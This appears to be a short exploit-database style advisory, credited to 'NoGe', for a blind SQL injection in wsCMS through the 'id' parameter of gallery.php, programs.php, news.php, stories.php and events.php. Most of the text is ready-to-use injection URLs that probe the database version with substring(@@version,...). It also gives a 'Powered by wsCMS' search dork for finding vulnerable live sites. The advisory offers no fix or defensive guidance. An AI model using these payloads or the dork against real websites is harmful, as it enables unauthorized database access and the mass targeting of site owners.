wsCMS Blind SQL Injection Vuln


[o] wsCMS Blind SQL Injection Vulnerability

Software : wsCMS
Vendor : http://www.websolutions.ca/
Author : NoGe


[o] Vulnerable file
gallery.php
programs.php
news.php
stories.php
events.php

all file above affected by "id" parameter


[o] Exploit
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by wsCMS"


[o] Note
this a private script